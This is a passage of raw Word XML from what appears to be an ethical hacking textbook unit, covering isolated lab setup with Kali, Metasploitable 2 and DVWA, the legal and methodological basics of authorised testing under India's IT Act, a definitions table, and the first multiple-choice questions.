          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network mode is set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — never Bridged — so nothing reaches a real network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker and target machines can ping each other; internet access on the targets is disabled or restricted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nessus Essentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is installed on Kali for Unit II.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A clean snapshot is taken before starting any exercise, so the lab can always be reset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">■ Simplified lab network architecture</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">+-------------------+        Host-only / Internal network        +----------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">|   Kali Linux       |  &lt;-------------------------------------&gt;  |  Metasploitable 2     |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">|   (attacker)        |                                          |  (vulnerable target)   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">|   Nmap, Metasploit,|                                          +----------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">|   Burp, John, etc.  |  &lt;-------------------------------------&gt;  +----------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">+-------------------+                                          |  DVWA (web target)     |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                                                                 +----------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   No route to the real internet or any production network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking is a neutral skill; authorisation and intent make it ethical or criminal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hackers are classified by intent/authorisation: White, Black, Grey Hat, Hacktivist, Script Kiddie, Nation-State.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The IT Act 2000 (Sections 43, 65, 66, 66B, 66C, 66F) is the core legal framework governing testing in India.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Written authorisation, RoE, NDA and scope are mandatory before any technique in this book is used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The 5 phases — Recon, Scanning &amp; Enumeration, Gaining Access, Maintaining Access, Covering Tracks — structure every engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Cyber Kill Chain (7 stages) shows attackers must succeed everywhere; defenders need only break one link.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Red/Blue/Purple teams, VAPT vs PT vs VA, PTES and the OWASP Testing Guide define professional methodology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All hands-on work happens only in an isolated lab: Kali Linux + Metasploitable 2 + DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Important Definitions &amp; Terminology</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2437"/>
        <w:gridCol w:w="7309"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Ethical hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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Authorised security testing performed with written permission to find and report weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Rules of Engagement (RoE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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The agreed boundaries of a test — testing window, allowed techniques, emergency contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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The precise, written list of systems a tester is and is not allowed to touch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Cyber Kill Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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 7-stage model of how an intrusion typically unfolds, used to find points to detect/interrupt it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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 team that simulates real adversaries to test detection and response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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VAPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Vulnerability Assessment and Penetration Testing — combines broad scanning with deep manual exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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PTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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Penetration Testing Execution Standard — a 7-stage professional testing methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple-Choice Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A tester finds a vulnerability on a client system that is outside the agreed scope. What should they do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit it anyway since it helps the client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report it is out of scope and seek written approval before testing it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ignore it completely and never mention it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test it quietly without telling the client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which IT Act section specifically covers cyber terrorism against critical infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Section 43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Section 66B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Section 66F</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Section 65</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A grey hat hacker who finds a bug without permission and reports it for free is:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Acting fully legally because intent was good</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
